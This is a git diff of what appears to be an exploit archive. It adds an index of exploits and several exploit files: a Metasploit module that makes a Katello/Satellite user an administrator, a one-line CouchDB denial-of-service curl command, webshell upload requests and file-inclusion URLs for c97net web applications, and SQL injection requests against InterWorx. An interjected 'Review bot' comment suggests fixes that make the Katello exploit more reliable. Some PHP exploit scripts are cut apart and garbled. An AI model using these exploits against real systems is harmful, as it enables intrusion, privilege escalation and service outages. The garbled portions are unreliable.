diff --git a/files.csv b/files.csv
index 96a88afdf..bd42a00c6 100755
--- a/files.csv
+++ b/files.csv
@@ -21086,7 +21086,7 @@ id,file,description,date,author,platform,type,port
 23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0
 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0
-23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
+23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0
 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0
 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0
@@ -29263,3 +29263,31 @@ id,file,description,date,author,platform,type,port
 32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
 32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0
 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
+32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
+32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0
+32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
+32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
+32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
+32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0
+32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0
+32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0
+32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0
+32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0
+32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple 
Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80
+32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
+32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
+32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
+32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443
+32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80
+32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
+32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0
+32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0
+32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0
+32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0
+32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0
+32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
+32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 'announcements.php' SQL Injection Vulnerability",2008-10-23,xuanmumu,php,webapps,0
+32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 'liste' 
Parameter Cross Site Scripting Vulnerability",2008-10-23,"Omer Singer",php,webapps,0
+32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
+32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
+32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
diff --git a/platforms/linux/remote/32515.rb b/platforms/linux/remote/32515.rb
new file mode 100755
index 000000000..4c5c2fb3a
--- /dev/null
+++ b/platforms/linux/remote/32515.rb
@@ -0,0 +1,147 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization', + 'Description' => %q{ + This module exploits a missing authorization vulnerability in the + "update_roles" action of "users" controller of Katello and Red Hat Satellite + (Katello 1.5.0-14 and earlier) by changing the specified account to an + administrator account. + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2143'], + ['CWE', '862'] + ], + 'DisclosureDate' => 'Mar 24 2014' + ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Your username']), + OptString.new('PASSWORD', [true, 'Your password']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + ], self.class + ) + end + + def run + print_status("Logging into #{target_url}...") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'user_session', 'new'), + 'vars_get' => { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + print_status('Retrieving the CSRF token for this session...') + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'dashboard') + ) + + if res.nil? 
+ print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Failed to retrieve the user id') + return + else + csrf_token = $1 if res.body =~ //i + csrf_token = $1 if res.body =~ //i if csrf_token.nil? + + if csrf_token.nil? + print_error('Failed to retrieve the CSRF token') + return + end + + user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/ + + if user.nil? + print_error('Failed to retrieve the user id') + return + end + end + + print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...") + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'headers' => { + 'X-CSRF-Token' => csrf_token + }, + 'method' => 'PUT', + 'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'), + 'vars_post' => { + 'user[role_ids][]' => '1' + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['X-Message-Type'] =~ /success$/ + print_good('User updated successfully') + else + print_error('Failed to update user') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end \ No newline at end of file diff --git a/platforms/multiple/dos/32519.txt b/platforms/multiple/dos/32519.txt new file mode 100755 index 000000000..abe34f8ce --- /dev/null +++ b/platforms/multiple/dos/32519.txt 
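Review bot: In `run`, the third `if res.headers['Location'] =~ /user_session\/new$/` check after the dashboard request can never take its error branch, because the identical check immediately above it on the same `res` already returned, so `print_error('Failed to retrieve the user id')` there is dead code with a misleading message; the CSRF-token and user-id extraction should run unconditionally (drop that `if`/`else` wrapper and keep its body). Separately, `datastore['USERNAME']` is interpolated unescaped into the user-id regex, so a username containing regex metacharacters (`.`, `+`, `(`) silently fails to match and the module reports `Failed to retrieve the user id`; use `user = $1 if res.body =~ /\/users.(\d+)#list_search=#{Regexp.escape(datastore['USERNAME'])}/`. The two meta-tag regexes that populate `csrf_token` appear here as `//i`, which looks like the page rendering stripped their HTML content, so they cannot be reviewed from this view.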
@@ -0,0 +1,16 @@ +# Exploit Title: Couchdb uuids DOS exploit +# Google Dork inurl: _uuids +# Date: 03/24/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://couchdb.apache.org/ +# Software Link: http://couchdb.apache.org/ +# Version: up to 1.5.0 +# Tested on: Linux Couchdb up to 1.5.0 + +HOW TO +====== +curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999 + +TEST +==== +Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request. \ No newline at end of file diff --git a/platforms/multiple/local/32501.txt b/platforms/multiple/local/32501.txt new file mode 100755 index 000000000..7b4cdb98d --- /dev/null +++ b/platforms/multiple/local/32501.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/31853/info + +MIFARE Classic is prone to multiple security weaknesses: + +1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register. + +2. A security weakness may allow attackers to recover the previous state of the linear feedback shift register. + +3. A security weakness may allow attackers to invert the filter function and potentially gain access to the private key. + +4. A security weakness may allow attackers to reduce the search space for tag nonces. + +Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. + +http://www.exploit-db.com/sploits/32501.tgz \ No newline at end of file diff --git a/platforms/php/webapps/32502.txt b/platforms/php/webapps/32502.txt new file mode 100755 index 000000000..84a2f6506 --- /dev/null +++ b/platforms/php/webapps/32502.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: etSimple CMS v3.3.1 Persistent Cross Site Scripting + +# Google Dork: N/A + +# Date: 24-03-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://get-simple.info/ + +# Software Link: http://get-simple.info/download/ + +# Version: v3.3.1 + +# Tested on: N/A + +# CVE : N/A + +# + +## Description: + +# + +# In the administrative interface, the users can change their personal +settings. The parameters "name" and + +# "permalink" do not properly sanitize its input and allows malicious code +to be stored in the XML file. + +# + +## PoC: + +# Admin"> + +# http://url/admin/settings.php + +# + +# + +# The following parameters are vulnerable: + +# + +# 1. Permalink + +# 2. Name + +# + +# + +# More information can be found at: +http://www.nerdbox.it/getsimple-cms-v3-3-1-vulnerabilities/ \ No newline at end of file diff --git a/platforms/php/webapps/32503.txt b/platforms/php/webapps/32503.txt new file mode 100755 index 000000000..da5282064 --- /dev/null +++ b/platforms/php/webapps/32503.txt 
@@ -0,0 +1,350 @@ +? +Cart Engine 3.0.0 Remote Code Execution + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated arbitrary code +execution. The vulnerability is caused due to the improper verification +of uploaded files in several modules thru several POST parameters. +This can be exploited to execute arbitrary PHP code by uploading +a malicious PHP script file that will be stored in '/public/image' +directory. Minimum permissions needed for a user to upload any file: + +User level: Regular (param: user_level=1) +Admin level: Editor (param: admin_level=3) + +Only the 'Super Admin' level makes the Tool 'File Manager' available. 
+ + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5182 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5182.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + + #1 (Modules > qBanner > Manage Banner > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1 + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------225222869427624 +Content-Disposition: form-data; name="group_id" + +QBANR +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_body" + +This page is part of qBanner module. Please use qBanner Manager to edit this page. 
+-----------------------------225222869427624 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_list" + +-----------------------------225222869427624-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #2 (Tools > File Manager > Upload) + +POST http://localhost/ce3_0/admin/fman/upload_process.php HTTP/1.1 + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="chdir" + +-----------------------------76802486520945 +Content-Disposition: form-data; name="n" + +5 +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_1"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_2"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_3"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_4"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_5"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945-- + + +Upload location: Anywhere within the webroot folder and its subfolders. 
+Exec: http://localhost/ce3_0/shell.php?cmd=whoami + + + + + #3 (Modules > Slideshow > Manage Slides > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1 + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------23201806221528 +Content-Disposition: form-data; name="group_id" + +SSHOW +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_body" + +This page is part of SlideShow module. Please use SlideShow Manager to edit this page. 
+-----------------------------23201806221528 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_list" + +-----------------------------23201806221528-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #4 (Contents > Manage Categories > Add Entry) + +POST http://localhost/ce3_0/admin/page_cat.php? HTTP/1.1 + + +-----------------------------205172563220150 +Content-Disposition: form-data; name="AXSRF_token" + +3afa0c7483889ac54d7b6afa4083a9a2 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------205172563220150 +Content-Disposition: form-data; name="group_id" + +GENPG +-----------------------------205172563220150 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------205172563220150 +Content-Disposition: form-data; name="permalink" + +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_details" + +
Zero Science Lab
+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #5 (Products > Category > Add Entry) + +POST http://localhost/ce3_0/admin/product_cat.php? HTTP/1.1 + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="AXSRF_token" + +c3d8ccc82a75bb49d7698b6ed27fd016 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------137423069119287 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------137423069119287 +Content-Disposition: form-data; name="permalink" + +zsl +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_details" + +CategoryDesc
+-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_keywords" + +Zero Science Lab +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_featured" + +-----------------------------137423069119287-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32504.txt b/platforms/php/webapps/32504.txt new file mode 100755 index 000000000..409a24f77 --- /dev/null +++ b/platforms/php/webapps/32504.txt 
@@ -0,0 +1,49 @@ +? +Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated file inclusion +vulnerability (LFI) when input passed thru the 'run' parameter to +task.php is not properly verified before being used to include files. +This can be exploited to include files from local resources with +directory traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5181 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32505.txt b/platforms/php/webapps/32505.txt new file mode 100755 index 000000000..06bd4b5bc --- /dev/null +++ b/platforms/php/webapps/32505.txt 
@@ -0,0 +1,179 @@ +? $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Cart Engine 3.0.0 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5180 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0]TEST
+-----------------------------9813040432632-- + + +Upload location: http://localhost/kemana/public/image/ +Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32508.txt b/platforms/php/webapps/32508.txt new file mode 100755 index 000000000..471416009 --- /dev/null +++ b/platforms/php/webapps/32508.txt @@ -0,0 +1,47 @@ +? +Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 1.5.6 + +Summary: Experience the ultimate directory script solution +with Kemana. Create your own Yahoo or Dmoz easily with Kemana. +Unique Kemana's features including: CMS engine based on our +qEngine, multiple directories support, user friendly administration +control panel, easy to use custom fields, unsurpassed flexibility. + +Desc: Kemana suffers from an authenticated file inclusion vulnerability +(LFI) when input passed thru the 'run' parameter to task.php is +not properly verified before being used to include files. This can +be exploited to include files from local resources with directory +traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5177 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32509.txt b/platforms/php/webapps/32509.txt new file mode 100755 index 000000000..134a74ad8 --- /dev/null +++ b/platforms/php/webapps/32509.txt 
@@ -0,0 +1,177 @@ + $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Kemana Directory 1.5.6 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5176 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0]Zero Science Lab
+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/qe6/public/image/ +Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami + + diff --git a/platforms/php/webapps/32516.txt b/platforms/php/webapps/32516.txt new file mode 100755 index 000000000..a9483865b --- /dev/null +++ b/platforms/php/webapps/32516.txt 
@@ -0,0 +1,72 @@ +================================================= +Title: SQL injection in InterWorx Control Panel +Product: InterWorx Web Control Panel +Vendor: InterWorx LLC +Tested Version: 5.0.13 build 574 +Vulnerability Type: SQL Injection [CWE-89] +CVE Reference: CVE-2014-2531 +Solution Status: Fixed in Version 5.0.14 build 577 +Discovered and Provided: Eric Flokstra +================================================= + +About the Vendor: +------------------------- +The InterWorx Hosting Control Panel is a web hosting and linux server +management system that provides tools for server administrators to +command their servers and for end users to oversee the operations of +their website. + +Advisory Details: +----------------------- +SQL injection vulnerability in the InterWorx Web Control Panel. + +The InterWorx application stores its data in a MySQL-database. For +interaction with the database dynamic queries are used. These queries +are created by concatenating strings from the application with user +input. However, the application does not perform proper validation or +escaping of the supplied input in the 'i' parameter when sorting user +accounts in NodeWorx, Siteworx and Resellers. Malicious users with +access to this functionality can manipulate database queries to +achieve other goals than the developers had in mind. + +The following requests can be used as proof of concept and demonstrate +that user input is concatenated into a database query without proper +validation or escaping. The payload in the first request checks +whether the letter 'm' is the first letter of the database version. +Since the database in use is MySQL this condition is true and the +table is sorted by column 'nu.email'. If the condition is false +(request 2/letter t) the table is sorted by column 'nu.nickname'. + +Request 1: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." 
+ +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Request 2: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." + +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Vendor contact timeline: +--------------------------------- +21 Feb 2014: Vendor notification +21 Feb 2014: Vulnerability confirmation +17 Mar 2014: Issue patched +25 Mar 2014: Public disclosure + +Solution: +------------ +Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel. + +References: +----------------- +[1] InterWorx Beta Channel - +http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel! +[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org +[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org \ No newline at end of file diff --git a/platforms/php/webapps/32520.txt b/platforms/php/webapps/32520.txt new file mode 100755 index 000000000..5d4c89a21 --- /dev/null +++ 